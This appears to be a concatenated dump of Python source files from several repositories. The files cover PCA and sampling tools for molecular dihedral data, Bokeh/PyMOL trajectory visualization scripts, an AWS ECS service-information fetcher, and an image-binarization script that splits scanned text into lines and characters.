plot_shift_diff(cs, dssp_file)
if pdb_file:
replace_bfactors(cs, 'diff', pdb_file, 'diff_shift', na_value=-1)
if distribution:
plot_distribution(cs, hdf_file)
if __name__=="__main__":
main()
sys.exit(0)
```
|
{
"source": "jeeberhardt/unrolr",
"score": 2
}
|
#### File: unrolr/core/pca.py
```python
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import numpy as np
from scipy import linalg
__author__ = "<NAME>"
__copyright__ = "Copyright 2020, <NAME>"
__license__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
class PCA:
def __init__(self, n_components=None):
"""Create DihedralPCa object
Args:
n_components (int, None): Number of components to keep. if n_components is not set all components are kept.
"""
self._n_components = n_components
self.components = None
self.singular_values = None
def fit_transform(self, X):
"""Fit the model with X and apply the dimensionality reduction on X.
Args:
X (ndarray): array-like, shape (n_samples, n_features)
Returns:
ndarray: final embedding (n_samples, n_components)
"""
# Centering the data
X -= np.mean(X, axis=0)
# Compute covariance matrix
cov = np.cov(X, rowvar=False)
# PCA!!!
        singular_values, components = linalg.eigh(cov)
# Sort by singular values
idx = np.argsort(singular_values)[::-1]
self.components = components[:, idx].T
self.singular_values = singular_values[idx]
if self._n_components is None:
            embedding = np.dot(X, self.components.T)
else:
embedding = np.dot(X, self.components[:int(self._n_components)].T)
return embedding
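if __name__ == "__main__":
    # Minimal usage sketch on synthetic data (not part of the original module):
    # project 100 samples with 10 features onto the first two components.
    rng = np.random.RandomState(0)
    X = rng.rand(100, 10)
    pca = PCA(n_components=2)
    embedding = pca.fit_transform(X)
    print(embedding.shape)  # (100, 2)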
```
#### File: unrolr/sampling/sampling.py
```python
import numpy as np
import pandas as pd
from .. import Unrolr
__author__ = "<NAME>"
__copyright__ = "Copyright 2020, <NAME>"
__license__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
def neighborhood_radius_sampler(X, r_neighbors, metric="dihedral", n_components=2,
n_iter=5000, n_runs=5, init="random", platform="OpenCL"):
"""Sample different neighborhood radius rc and compute the stress and correlation.
Args:
X (ndarray): n-dimensional ndarray (rows: frames; columns: features/angles)
        r_neighbors (array-like): list of the neighborhood radius cutoffs to try
metric (str): metric to use to compute distance between conformations (dihedral or intramolecular) (default: dihedral)
n_components (int): number of dimension of the embedding
n_iter (int): number of optimization cycles
n_runs (int): number of repetitions, in order to calculate standard deviation
init (str): method to initialize the initial embedding (random or pca)(default: random)
platform (str): platform to use for spe (OpenCL or CPU) (default: OpenCL)
Returns:
results (DataFrame): Pandas DataFrame containing columns ["run", "r_neighbor", "n_iter", "stress", "correlation"]
"""
columns = ["run", "r_neighbor", "n_iter", "stress", "correlation"]
data = []
for r_neighbor in r_neighbors:
U = Unrolr(r_neighbor, metric, n_components, n_iter, init=init, platform=platform)
for i in range(n_runs):
U.fit_transform(X)
data.append([i, r_neighbor, n_iter, U.stress, U.correlation])
df = pd.DataFrame(data=data, columns=columns)
return df
def optimization_cycle_sampler(X, n_iters, r_neighbor, metric="dihedral", n_components=2,
n_runs=5, init="random", platform="OpenCL"):
"""Sample different number of optimization cycle with a certain
neighborhood radius rc and compute the stress and correlation.
Args:
X (ndarray): n-dimensional ndarray (rows: frames; columns: features/angles)
n_iters (array-like): list of the iteration numbers to try
        r_neighbor (float): neighborhood radius cutoff
metric (str): metric to use to compute distance between conformations (dihedral or intramolecular) (default: dihedral)
n_components (int): number of dimension of the embedding
n_runs (int): number of repetitions, in order to calculate standard deviation
init (str): method to initialize the initial embedding (random or pca)(default: random)
platform (str): platform to use for spe (OpenCL or CPU) (default: OpenCL)
Returns:
results (DataFrame): Pandas DataFrame containing columns ["run", "r_neighbor", "n_iter", "stress", "correlation"]
"""
columns = ["run", "r_neighbor", "n_iter", "stress", "correlation"]
data = []
for n_iter in n_iters:
U = Unrolr(r_neighbor, metric, n_components, n_iter, init=init, platform=platform)
for i in range(n_runs):
U.fit_transform(X)
data.append([i, r_neighbor, n_iter, U.stress, U.correlation])
df = pd.DataFrame(data=data, columns=columns)
return df
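# Usage sketch (assumes a dihedral-angle array `X` and a configured OpenCL
# context; the radius values below are illustrative only):
# results = neighborhood_radius_sampler(X, r_neighbors=[0.1, 0.2, 0.3], n_runs=3)
# results.groupby("r_neighbor")[["stress", "correlation"]].mean()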
```
#### File: unrolr/utils/utils.py
```python
from __future__ import print_function
import os
import sys
if sys.version_info >= (3, ):
import importlib
else:
import imp
import h5py
import pyopencl as cl
import numpy as np
__author__ = "<NAME>"
__copyright__ = "Copyright 2018, <NAME>"
__license__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
def read_dataset(fname, dname, start=0, stop=-1, skip=1):
"""Read dataset from HDF5 file."""
data = None
try:
with h5py.File(fname, 'r') as f:
if stop == -1:
return f[dname][start::skip,]
else:
return f[dname][start:stop:skip,]
except IOError:
print("Error: cannot find file %s." % fname)
return data
def save_dataset(fname, dname, data):
"""Save dataset to HDF5 file."""
with h5py.File(fname, 'w') as w:
try:
dset = w.create_dataset(dname, (data.shape[0], data.shape[1]))
dset[:] = data
except:
pass
w.flush()
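# Round-trip sketch (hypothetical file and dataset names):
# data = np.random.rand(100, 10).astype(np.float32)
# save_dataset("dihedrals.h5", "dihedral_angles", data)
# every_other = read_dataset("dihedrals.h5", "dihedral_angles", start=0, skip=2)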
def transform_dihedral_to_metric(dihedral_timeseries):
"""Convert angles in radians to sine/cosine transformed coordinates.
The output will be used as the PCA input for dihedral PCA (dPCA)
Args:
        dihedral_timeseries (ndarray): array containing dihedral angles, shape (n_samples, n_features)
Returns:
ndarray: sine/cosine transformed coordinates
"""
new_shape = (dihedral_timeseries.shape[0] * 2, dihedral_timeseries.shape[1])
data = np.zeros(shape=new_shape, dtype=np.float32)
for i in range(dihedral_timeseries.shape[0]):
data[(i * 2)] = np.cos(dihedral_timeseries[i])
data[(i * 2) + 1] = np.sin(dihedral_timeseries[i])
return data
def transform_dihedral_to_circular_mean(dihedral_timeseries):
"""Convert angles in radians to circular mean transformed angles.
The output will be used as the PCA input for dihedral PCA+ (dPCA+)
Args:
        dihedral_timeseries (ndarray): array containing dihedral angles, shape (n_samples, n_features)
Returns:
ndarray: circular mean transformed angles
"""
cm = np.zeros(shape=dihedral_timeseries.shape, dtype=np.float32)
# Create a flat view of the numpy arrays.
cmf = cm.ravel()
dtf = dihedral_timeseries.ravel()
x = np.cos(dtf)
y = np.sin(dtf)
# In order to avoid undefined mean angles
zero_y = np.where(y == 0.)[0]
if zero_y.size > 0:
        y[zero_y] += 1E-6
# Cases x > 0 and x < 0 are combined together
nonzero_x = np.where(x != 0.)
neg_x = np.where(x < 0.)
sign_y = np.sign(y)
# 1. x > 0
cmf[nonzero_x] = np.arctan(y[nonzero_x] / x[nonzero_x])
# 2. x < 0
cmf[neg_x] += sign_y[neg_x] * np.pi
# Case when x equal to 0
zero_x = np.where(x == 0.)[0]
if zero_x.size > 0:
cmf[zero_x] = sign_y[zero_x] * (np.pi / 2.)
return cm
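# Shape sketch for the two transforms on a toy trajectory (2 frames x 3 angles):
# the sine/cosine transform doubles the row count, while the circular-mean
# transform preserves the input shape.
# angles = np.array([[0.0, np.pi / 2, np.pi], [0.1, 0.2, 0.3]], dtype=np.float32)
# transform_dihedral_to_metric(angles).shape         # (4, 3)
# transform_dihedral_to_circular_mean(angles).shape  # (2, 3)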
def is_opencl_env_defined():
"""Check if OpenCL env. variable is defined."""
variable_name = "PYOPENCL_CTX"
if os.environ.get(variable_name):
return True
else:
return False
def path_module(module_name):
try:
specs = importlib.machinery.PathFinder().find_spec(module_name)
if specs is not None:
return specs.submodule_search_locations[0]
    except Exception:
try:
_, path, _ = imp.find_module(module_name)
abspath = os.path.abspath(path)
return abspath
except ImportError:
return None
return None
def max_conformations_from_dataset(fname, dname):
"""Get maximum number of conformations that can fit
into the memory of the selected OpenCL device and
also the step/interval """
if not is_opencl_env_defined():
print("Error: The environnment variable PYOPENCL_CTX is not defined.")
print("Tip: python -c \"import pyopencl as cl; cl.create_some_context()\"")
sys.exit(1)
ctx = cl.create_some_context()
max_size = int(ctx.devices[0].max_mem_alloc_size)
try:
with h5py.File(fname, 'r') as f:
bytes_size = f[dname].dtype.itemsize
n_conf, n_dim = f[dname].shape
data_size = bytes_size * n_conf * n_dim
    except IOError:
        print("Error: cannot find file %s." % fname)
        sys.exit(1)
if data_size > max_size:
""" Return the first interval that produces a dataset
with a size inferior than max_size """
        for i in range(1, n_conf):
            if n_conf % i == 0:
                tmp_size = (n_conf // i) * n_dim * bytes_size
                if tmp_size <= max_size:
                    return (n_conf // i, i)
# Return None if we didn't find anything
return (None, None)
else:
        return (n_conf, 1)
```
|
{
"source": "jeeberhardt/visualize",
"score": 3
}
|
#### File: visualize/scripts/run_servers.py
```python
from __future__ import print_function
import time
import shlex
import subprocess
__author__ = "<NAME>"
__copyright__ = "Copyright 2016, <NAME>"
__license__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
def execute_command(cmd_line):
args = shlex.split(cmd_line)
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, errors = p.communicate()
return output, errors
def start_screen_command(cmd, session_name):
cmd_line = "screen -d -m -S %s %s" % (session_name, cmd)
return execute_command(cmd_line)
def stop_screen_command(session_name):
cmd_line = "screen -S %s -X quit" % session_name
return execute_command(cmd_line)
def main():
try:
# Start Bokeh server and PyMOL
start_screen_command("bokeh serve", "visu_bokeh")
start_screen_command("pymol -R", "visu_pymol")
# Dirty hack to be sure Bokeh and Pymol are running...
while True:
time.sleep(3600)
except KeyboardInterrupt:
pass
finally:
# Kill all screen session
stop_screen_command("visu_bokeh")
stop_screen_command("visu_pymol")
if __name__ == "__main__":
main()
```
#### File: visualize/scripts/visualize.py
```python
from __future__ import print_function
import os
import sys
import random
import argparse
import warnings
import subprocess
import numpy as np
from xmlrpclib import ServerProxy
from MDAnalysis import Universe
from bokeh.client import push_session
from bokeh.models import HoverTool, ColumnDataSource
from bokeh.plotting import figure, curdoc
from matplotlib.cm import get_cmap
from matplotlib import colors
warnings.filterwarnings("ignore")
__author__ = "<NAME>"
__copyright__ = "Copyright 2016, <NAME>"
__license__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
class Visualize():
def __init__(self, top_file, dcd_files, config_file):
# Start Bokeh server
if not self.is_screen_running("visu_bokeh"):
print("Error: Bokeh is not running")
sys.exit(1)
# Start PyMOL
if not self.is_screen_running("visu_pymol"):
print("Error: Pymol is not running")
sys.exit(1)
# Open DCD trajectory
self.u = Universe(top_file, dcd_files)
# Read configuration file
self.comments = self.read_comments(config_file)
self.coord, self.frames, self.energy = self.read_configuration(config_file)
def is_screen_running(self, sname):
output = subprocess.check_output(["screen -ls; true"], shell=True)
return [l for l in output.split("\n") if sname in l]
def read_configuration(self, config_file):
"""
Read configuration file
"""
coord = None
frames = None
energy = None
data = np.loadtxt(config_file, delimiter=',')
if data.shape[1] == 2:
coord = np.fliplr(data[:, 0:])
frames = np.arange(0, coord.shape[0])
energy = None
#print(coord)
#print(frames)
#print(energy)
elif data.shape[1] == 3:
coord = np.fliplr(data[:, 1:])
frames = data[:, 0]
energy = None
elif data.shape[1] == 4:
coord = np.fliplr(data[:, 1:3])
frames = data[:, 0]
energy = data[:, 3]
else:
print("Error: Cannot read coordinates file! (#Columns: %s)" % data.shape[1])
sys.exit(1)
return coord, frames, energy
def read_comments(self, fname, comments="#"):
with open(fname) as f:
for line in f:
if comments in line:
line = line.replace("%s " % comments, "")
return {pname: pvalue for pname, pvalue in zip(line.split(" ")[::2], line.split(" ")[1::2])}
return None
def update_pymol(self, indices):
rpc_port = 9123
if indices:
frames = []
for indice in indices:
i, j = self.id_to_H_frame[indice]
frames = np.concatenate((frames, np.trim_zeros(self.H_frame[i, j], "b")))
nb_frames = frames.shape[0]
if nb_frames > self.max_frame:
print("Too much frames (%s). So we choose %s structures randomly." % (nb_frames, self.max_frame))
frames = random.sample(frames, self.max_frame)
try:
pymol = ServerProxy(uri="http://localhost:%s/RPC2" % rpc_port)
pymol.do("delete s*")
for frame in frames:
frame = np.int(frame)
# Go to the frame
self.u.trajectory[frame]
# Write the PDB file
self.u.atoms.write("structure.pdb")
try:
pymol.load("%s/structure.pdb" % os.getcwd())
                except Exception:
                    print("Can't load PDB structure!")
if self.cartoon:
pymol.show("cartoon")
else:
pymol.show("ribbon")
pymol.hide("lines")
pymol.do("copy s%s, structure" % frame)
pymol.delete("structure")
pymol.do("show sticks, organic")
if np.int(frames[0]) != frame and nb_frames > 1:
pymol.do("align s%d, s%d" % (frame, frames[0]))
pymol.do("center s%s" % frame)
        except Exception:
print("Connection issue with PyMol! (Cmd: pymol -R)")
def get_selected_frames(self, attr, old, new):
self.update_pymol(new["1d"]["indices"])
    def generate_color(self, value, cmap):
return colors.rgb2hex(get_cmap(cmap)(value))
def assignbins2D(self, coordinates, bin_size):
x_min, x_max = np.min(coordinates[:, 0]), np.max(coordinates[:, 0])
y_min, y_max = np.min(coordinates[:, 1]), np.max(coordinates[:, 1])
x_length = (x_max - x_min)
y_length = (y_max - y_min)
x_center = x_min + (x_length/2)
y_center = y_min + (y_length/2)
if x_length > y_length:
x_limit = np.array([x_center-(x_length/2)-0.5, x_center+(x_length/2)+0.5])
y_limit = np.array([y_center-(x_length/2)-0.5, y_center+(x_length/2)+0.5])
else:
x_limit = np.array([x_center-(y_length/2)-0.5, x_center+(y_length/2)+0.5])
y_limit = np.array([y_center-(y_length/2)-0.5, y_center+(y_length/2)+0.5])
x_bins = np.arange(float(x_limit[0]), (float(x_limit[1]) + bin_size), bin_size)
y_bins = np.arange(float(y_limit[0]), (float(y_limit[1]) + bin_size), bin_size)
return x_bins, y_bins
def show(self, bin_size=0.025, min_bin=0, max_frame=25, cartoon=False):
        # Store some information
self.bin_size = bin_size
self.min_bin = min_bin
self.max_frame = max_frame
self.cartoon = cartoon
self.H_frame = None
self.id_to_H_frame = []
title = ""
xx, yy = [], []
count, color, e = [], [], []
# Get edges
edges_x, edges_y = self.assignbins2D(self.coord, bin_size)
# Get 2D histogram, just to have the number of conformation per bin
H, edges_x, edges_y = np.histogram2d(self.coord[:, 0], self.coord[:, 1], bins=(edges_x, edges_y))
# ... and replace all zeros by nan
H[H == 0.] = np.nan
# Initialize histogram array and frame array
tmp = np.zeros(shape=(edges_x.shape[0], edges_y.shape[0], 1), dtype=np.int32)
try:
self.H_frame = np.zeros(shape=(edges_x.shape[0], edges_y.shape[0], np.int(np.nanmax(H))), dtype=np.int32)
except MemoryError:
print('Error: Histogram too big (memory). Try with a bigger bin size.')
sys.exit(1)
if self.energy is not None:
H_energy = np.empty(shape=(edges_x.shape[0], edges_y.shape[0], np.int(np.nanmax(H))))
H_energy.fill(np.nan)
# Return the indices of the bins to which each value in input array belongs
# I don't know why - 1, but it works perfectly like this
ix = np.digitize(self.coord[:, 0], edges_x) - 1
iy = np.digitize(self.coord[:, 1], edges_y) - 1
# For each coordinate, we put them in the right bin and add the frame number
for i in xrange(0, self.frames.shape[0]):
# Put frame numbers in a histogram too
self.H_frame[ix[i], iy[i], tmp[ix[i], iy[i]]] = self.frames[i]
# The same for the energy, if we provide them
if self.energy is not None:
H_energy[ix[i], iy[i], tmp[ix[i], iy[i]]] = self.energy[i]
# Add 1 to the corresponding bin
tmp[ix[i], iy[i]] += 1
if self.energy is not None:
# get mean energy per bin
H_energy = np.nanmean(H_energy, axis=2)
# Get STD and MEAN conformations/energy
if self.energy is not None:
std = np.nanstd(H_energy)
mean = np.nanmean(H_energy)
else:
std = np.int(np.nanstd(H))
mean = np.int(np.nanmean(H))
# Get min_hist and max_hist
min_hist = mean - std
max_hist = mean + std
# Put min_hist equal to min_bin is lower than 0
min_hist = min_hist if min_hist > 0 else min_bin
unit = '#conf.' if self.energy is None else 'Kcal/mol'
print("Min: %8.2f Max: %8.2f (%s)" % (min_hist, max_hist, unit))
        # And keep only the bins that contain structures
for i in xrange(0, H.shape[0]):
for j in xrange(0, H.shape[1]):
if H[i, j] > min_bin:
xx.append(edges_x[i])
yy.append(edges_y[j])
self.id_to_H_frame.append((i, j))
count.append(H[i, j])
if self.energy is None:
value = 1. - (np.float(H[i, j]) - min_hist) / (max_hist - min_hist)
else:
value = (np.float(H_energy[i, j]) - min_hist) / (max_hist - min_hist)
e.append(H_energy[i, j])
color.append(self.generate_color(value, "jet"))
TOOLS = "wheel_zoom,box_zoom,undo,redo,box_select,save,reset,hover,crosshair,tap,pan"
        # Create the title with all the parameters contained in the file
if self.comments:
for key, value in self.comments.iteritems():
title += "%s: %s " % (key, value)
else:
title = "#conformations: %s" % self.frames.shape[0]
p = figure(plot_width=1500, plot_height=1500, tools=TOOLS, title=title)
p.title.text_font_size = '20pt'
# Create source
source = ColumnDataSource(data=dict(xx=xx, yy=yy, count=count, color=color))
if self.energy is not None:
source.add(e, name="energy")
# Create histogram
p.rect(x="xx", y="yy", source=source, width=bin_size, height=bin_size,
color="color", line_alpha="color", line_color="black")
# Create Hovertools
tooltips = [("(X, Y)", "(@xx @yy)"), ("#Frames", "@count")]
if self.energy is not None:
tooltips += [("Energy (Kcal/mol)", "@energy")]
hover = p.select({"type": HoverTool})
hover.tooltips = tooltips
# open a session to keep our local document in sync with server
session = push_session(curdoc())
# Update data when we select conformations
source.on_change("selected", self.get_selected_frames)
# Open the document in a browser
session.show(p)
# Run forever !!
session.loop_until_closed()
def parse_options():
parser = argparse.ArgumentParser(description="visu 2D configuration")
parser.add_argument("-t", "--top", dest="top_file", required=True,
action="store", type=str,
help="psf or pdb file used for simulation")
parser.add_argument("-d", "--dcd", dest="dcd_files", required=True,
action="store", type=str, nargs="+",
help="list of dcd files")
parser.add_argument("-c", "--configuration", dest="config_file",
required=True, action="store", type=str,
help="configuration file")
parser.add_argument("-b", "--bin", dest="bin_size", default=0.025,
action="store", type=float,
help="bin size of the histogram")
parser.add_argument("--max-frame", dest="max_frame", default=25,
action="store", type=int,
help="maximum number of randomly picked frames")
parser.add_argument("--min-bin", dest="min_bin", default=0,
action="store", type=int,
help="minimal number of frames needed to show the bin")
parser.add_argument("--cartoon", dest="cartoon", default=False,
action="store_true",
help="Turn on cartoon representation in PyMOL")
args = parser.parse_args()
return args
def main():
options = parse_options()
top_file = options.top_file
dcd_files = options.dcd_files
config_file = options.config_file
bin_size = options.bin_size
cartoon = options.cartoon
max_frame = options.max_frame
min_bin = options.min_bin
V = Visualize(top_file, dcd_files, config_file)
V.show(bin_size, min_bin, max_frame, cartoon)
if __name__ == "__main__":
main()
```
|
{
"source": "jeechu/cloudlift",
"score": 2
}
|
#### File: cloudlift/deployment/service_information_fetcher.py
```python
from re import search
from cloudlift.config import get_client_for
from cloudlift.config import get_cluster_name, get_service_stack_name
from cloudlift.config import get_region_for_environment
from cloudlift.config.logging import log, log_warning, log_intent
from cloudlift.deployment.ecs import DeployAction, EcsClient
from cloudlift.exceptions import UnrecoverableException
class ServiceInformationFetcher(object):
def __init__(self, name, environment, service_configuration):
self.name = name
self.environment = environment
self.cluster_name = get_cluster_name(environment)
self.cfn_client = get_client_for('cloudformation', self.environment)
self.service_configuration = service_configuration
self.service_info = {}
self.init_stack_info()
def init_stack_info(self):
stack_name = get_service_stack_name(self.environment, self.name)
try:
stack = self.cfn_client.describe_stacks(StackName=stack_name)['Stacks'][0]
self.stack_found = True
stack_outputs = {output['OutputKey']: output['OutputValue'] for output in stack['Outputs']}
for service_name, service_config in self.service_configuration.get('services', {}).items():
service_metadata = dict()
if "ecs_service_name" in service_config:
service_metadata["ecs_service_name"] = service_config.get('ecs_service_name')
else:
service_metadata["ecs_service_name"] = stack_outputs.get(f'{service_name}EcsServiceName')
service_metadata["secrets_name"] = service_config.get('secrets_name', None)
self.service_info[service_name] = service_metadata
self.listener_rules = [resource_summary for resource_summary in (self._get_stack_resource_summaries())
if resource_summary['LogicalResourceId'].endswith('ListenerRule')]
        except Exception:
self.stack_found = False
log_warning("Could not determine services. Stack not found")
def get_current_image_uri(self):
ecr_image_uri = self._fetch_current_image_uri()
log_intent(f"Currently deployed tag: {ecr_image_uri}")
return str(ecr_image_uri)
def get_instance_ids(self):
instance_ids = {}
ecs_client = get_client_for('ecs', self.environment)
        for service in [info["ecs_service_name"] for info in self.service_info.values()]:
task_arns = ecs_client.list_tasks(
cluster=self.cluster_name,
serviceName=service
)['taskArns']
tasks = ecs_client.describe_tasks(
cluster=self.cluster_name,
tasks=task_arns
)['tasks']
container_instance_arns = [
task['containerInstanceArn'] for task in tasks
]
container_instances = ecs_client.describe_container_instances(
cluster=self.cluster_name,
containerInstances=container_instance_arns
)['containerInstances']
service_instance_ids = [
container['ec2InstanceId'] for container in container_instances
]
instance_ids[service] = service_instance_ids
return instance_ids
def get_version(self, print_image=False, print_git=False):
image = self._fetch_current_image_uri()
tag = image.split(':').pop()
if print_image:
print(image)
return
if print_git:
print(search("^[0-9a-f]{5,40}", tag).group())
return
print(tag)
def _fetch_current_image_uri(self):
ecs_client = get_client_for('ecs', self.environment)
if len(self.service_info) < 1:
raise UnrecoverableException("cannot get running image_uri: no ECS services found")
logical_service_name = next(iter(self.service_info))
ecs_service_name = self.service_info[logical_service_name].get('ecs_service_name')
task_arns = ecs_client.list_tasks(
cluster=self.cluster_name,
serviceName=ecs_service_name
)['taskArns']
if len(task_arns) < 1:
raise UnrecoverableException("cannot get running image_uri: no task ARNs found for service")
tasks = ecs_client.describe_tasks(
cluster=self.cluster_name,
tasks=task_arns
)['tasks']
task_definition_arns = tasks[0]['taskDefinitionArn']
task_definition = ecs_client.describe_task_definition(
taskDefinition=task_definition_arns
)
return task_definition['taskDefinition']['containerDefinitions'][0]['image']
def _get_stack_resource_summaries(self):
stack_name = get_service_stack_name(self.environment, self.name)
response = self.cfn_client.list_stack_resources(StackName=stack_name)
resource_summaries = response['StackResourceSummaries']
while 'NextToken' in response:
response = self.cfn_client.list_stack_resources(
StackName=stack_name,
NextToken=response['NextToken'],
)
            resource_summaries.extend(response.get('StackResourceSummaries', []))
return resource_summaries
def get_existing_listener_rule_summary(self, service_name):
return next((rule for rule in self.listener_rules if rule['LogicalResourceId'].startswith(service_name)), None)
def fetch_current_desired_count(self):
desired_counts = {}
try:
deployment_ecs_client = EcsClient(None, None, get_region_for_environment(self.environment))
for logical_service_name, service_config in self.service_info.items():
deployment = DeployAction(deployment_ecs_client, self.cluster_name, service_config["ecs_service_name"])
desired_counts[logical_service_name] = deployment.service.desired_count
log("Existing service counts: " + str(desired_counts))
except Exception:
pass
return desired_counts
def get_current_deployment_identifier(self):
ecs_client = get_client_for('ecs', self.environment)
if len(self.service_info) < 1:
return None
logical_service_name = next(iter(self.service_info))
ecs_service_name = self.service_info[logical_service_name].get('ecs_service_name')
if ecs_service_name is None:
return None
task_arns = ecs_client.list_tasks(
cluster=self.cluster_name,
serviceName=ecs_service_name
)['taskArns']
if len(task_arns) < 1:
return None
tasks = ecs_client.describe_tasks(
cluster=self.cluster_name,
tasks=task_arns
)['tasks']
if len(tasks) < 1:
return None
task_definition_arns = tasks[0]['taskDefinitionArn']
task_definition = ecs_client.describe_task_definition(
taskDefinition=task_definition_arns,
include=[
'TAGS',
]
)
return next((tagDict['value'] for tagDict in task_definition['tags'] if tagDict['key'] == 'deployment_identifier'), None)
```
|
{
"source": "Jeeeeeiel/dipexpt",
"score": 3
}
|
#### File: Jeeeeeiel/dipexpt/dipexpt5.py
```python
import numpy as np
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFilter
from PIL import ImageEnhance
import matplotlib.pyplot as plt
import math
import os
# import pytesseract
def horizontal_hist(data):
hist = np.zeros(data.shape[0])
for i in range(data.shape[0]):
hist[i] = np.sum(data[i] == 0) # count black
return hist
def vertical_hist(data):
hist = np.zeros(data.shape[1])
for i in range(data.shape[1]):
hist[i] = np.sum(data[:, i])
return hist
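# Quick sketch: horizontal_hist counts black (0) pixels per row, while
# vertical_hist sums raw intensities per column. For a 2x2 binary image:
# img = np.array([[0, 255], [0, 0]])
# horizontal_hist(img)  # -> array([1., 2.])
# vertical_hist(img)    # -> array([0., 255.])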
def split_text_line(im, data):
hist = horizontal_hist(data)
draw = ImageDraw.Draw(im)
min_line_height = 8 # min in sample image: 11
line_height = 0
text_line_record = list()
for i in range(hist.shape[0]):
if hist[i] < 3: # min in sample: 4
if line_height >= min_line_height:
text_line_record.append((i - line_height, i - 1))
draw.line([(0, i), (data.shape[1], i)])
if 0 < line_height < min_line_height:
for j in range(1, line_height + 1):
draw.line([(0, i - j), (data.shape[1], i - j)])
line_height = 0
else:
line_height += 1
# print(text_line_record)
# im.show()
return text_line_record
def split_text_column(data): # data contains single text line
min_column_width = data.shape[0] * 0.4
max_column_width = data.shape[0] * 1.0
hist = vertical_hist(data)
text_column_record = list()
max_value = np.max(hist)
column_width = 0
threshold = max_value * 0.8
i = 0
while i < data.shape[1]:
if hist[i] > threshold:
if 0 < column_width < min_column_width:
column_width += 1
if i > 1 and (i - 2 not in text_column_record) and (i - 1 not in text_column_record) and hist[i - 1] == max_value and hist[i] == max_value:
text_column_record.append(i - 2)
text_column_record.append(i - 1)
text_column_record.append(i)
column_width = 0
i += 1
continue
if min_column_width <= column_width < max_column_width:
if (i + 1) < (data.shape[1] - 1) and hist[i] <= np.max(hist[i + 1: i + math.ceil(max_column_width) - column_width + 1]):
i = i + np.argmax(hist[i + 1: i + math.ceil(max_column_width) - column_width + 1]) + 1
# elif (i + 1) < (data.shape[1] - 1) and hist[i] == max_value:
# continue_appear = 0
# for j in range(1, len(hist[i + 1: i + math.ceil(max_column_width) - column_width + 1]) + 1):
# if hist[i + j] == max_value:
# continue_appear += 1
# if continue_appear > 1:
# i = i + j - 1
# break
# else:
# continue_appear = 0
elif column_width > 1.3 * max_column_width:
i = i - column_width
i = i + math.ceil(max_column_width * 0.8) + np.argmax(hist[i + math.ceil(max_column_width * 0.8): i + math.ceil(max_column_width * 1.2)]) + 1
text_column_record.append(i)
column_width = 0
i += 1
else:
i += 1
column_width += 1
# for show
# im = Image.new('L', (data.shape[1], data.shape[0] * 2), 255)
# pixels = im.load()
# for i in range(im.width):
# for j in range(data.shape[0]):
# pixels[i, j + data.shape[0]] = pixels[i, j] = int(data[j, i])
# im = im.convert('RGB')
# draw = ImageDraw.Draw(im, mode='RGB')
# for i in range(len(text_column_record)):
# draw.line([(text_column_record[i], 0), (text_column_record[i], data.shape[0])], fill='#ff0000')
# im.show()
tmp_record = list()
for i in range(len(text_column_record) - 1):
if text_column_record[i + 1] - text_column_record[i] > 1:
tmp_record.append((text_column_record[i] + 1, text_column_record[i + 1]))
text_column_record = tmp_record
# print(text_column_record)
return text_column_record
def min_filter(data, size=3): # block: size * size
tmpdata = np.zeros(data.shape)
for i in range(data.shape[0]):
for j in range(data.shape[1]):
# tmpdata[i, j] = np.min(data[(i - 1 >= 0) * (i - size // 2): i + size // 2, (j - 1 >= 0) * (j - size // 2): j + size // 2])
            # ((i - k) >= 0) * (i - k) clamps the lower slice bound at 0
            tmpdata[i, j] = np.min(data[((i - size // 2) >= 0) * (i - size // 2): i + size // 2 + 1, ((j - size // 2) >= 0) * (j - size // 2): j + size // 2 + 1])
return tmpdata
def max_filter(data, size=3): # block: size * size
tmpdata = np.zeros(data.shape)
for i in range(data.shape[0]):
for j in range(data.shape[1]):
# tmpdata[i, j] = np.max(data[(i - 1 >= 0) * (i - size // 2): i + size // 2, (j - 1 >= 0) * (j - size // 2): j + size // 2])
tmpdata[i, j] = np.max(data[((i - size // 2) >= 0) * (i - size // 2): i + size // 2 + 1, ((j - size // 2) >= 0) * (j - size // 2): j + size // 2 + 1])
return tmpdata
def noise_filter(data, size=3):  # block: size * size
    tmpdata = np.zeros(data.shape)
    for i in range(data.shape[0]):
        for j in range(data.shape[1]):
            if data[i, j] == 0 and np.sum(data[((i - size // 2) >= 0) * (i - size // 2): i + size // 2 + 1, ((j - size // 2) >= 0) * (j - size // 2): j + size // 2 + 1]) >= 255 * 6:
tmpdata[i, j] = 255
else:
tmpdata[i, j] = data[i, j]
return tmpdata
def binarize(im):
im = im.convert('L')
pixels = im.load()
data = np.zeros((im.height, im.width))
for i in range(im.width): # binarize
for j in range(im.height):
pixels[i, j] = 255 if pixels[i, j] > 165 else 0
data[j, i] = pixels[i, j]
return data
def extract_word_in_line(data, text_column_record, line_index): # single line text
dir = '/Users/Jeiel/Desktop/tmp/'
if not os.path.exists(dir):
os.mkdir(dir)
for i in range(len(text_column_record)):
im = create_im_with_data(data[:, text_column_record[i][0]: text_column_record[i][1]])
im.save(dir + str(line_index) + '_' + str(i + 1) + '.bmp')
# print(dir + str(line_index) + '_' + str(i + 1) + '.bmp')
# print(str(line_index) + '_' + str(i + 1) + ': ' + pytesseract.image_to_string(im, lang='chi_sim+eng'))
def create_im_with_data(data): # gray
im = Image.new('L', (data.shape[1], data.shape[0]))
pixels = im.load()
for i in range(im.width):
for j in range(im.height):
pixels[i, j] = int(data[j, i])
return im
def main():
im = Image.open('/Users/Jeiel/Dropbox/数字图像处理/实验/实验五-内容和素材/sample-24 copy.jpg')
enhancer = ImageEnhance.Sharpness(im)
im = enhancer.enhance(2)
data = binarize(im)
# im = im.filter(ImageFilter.MinFilter(3))
# im = im.filter(ImageFilter.MaxFilter(3))
# im.show()
# plt.figure()
# plt.imshow(data, cmap="gray")
# plt.show()
# return
text_line_record = split_text_line(im, data)
    # data = noise_filter(data)
expand_data = data
expand_data = min_filter(expand_data)
# expand_data = min_filter(expand_data)
# expand_data = max_filter(expand_data)
# plt.figure()
# plt.imshow(expand_data, cmap="gray")
# plt.show()
# return
# plt.figure()
# text_line = expand_data[text_line_record[0][0]: text_line_record[0][1]]
# text_column_record = split_text_column(text_line)
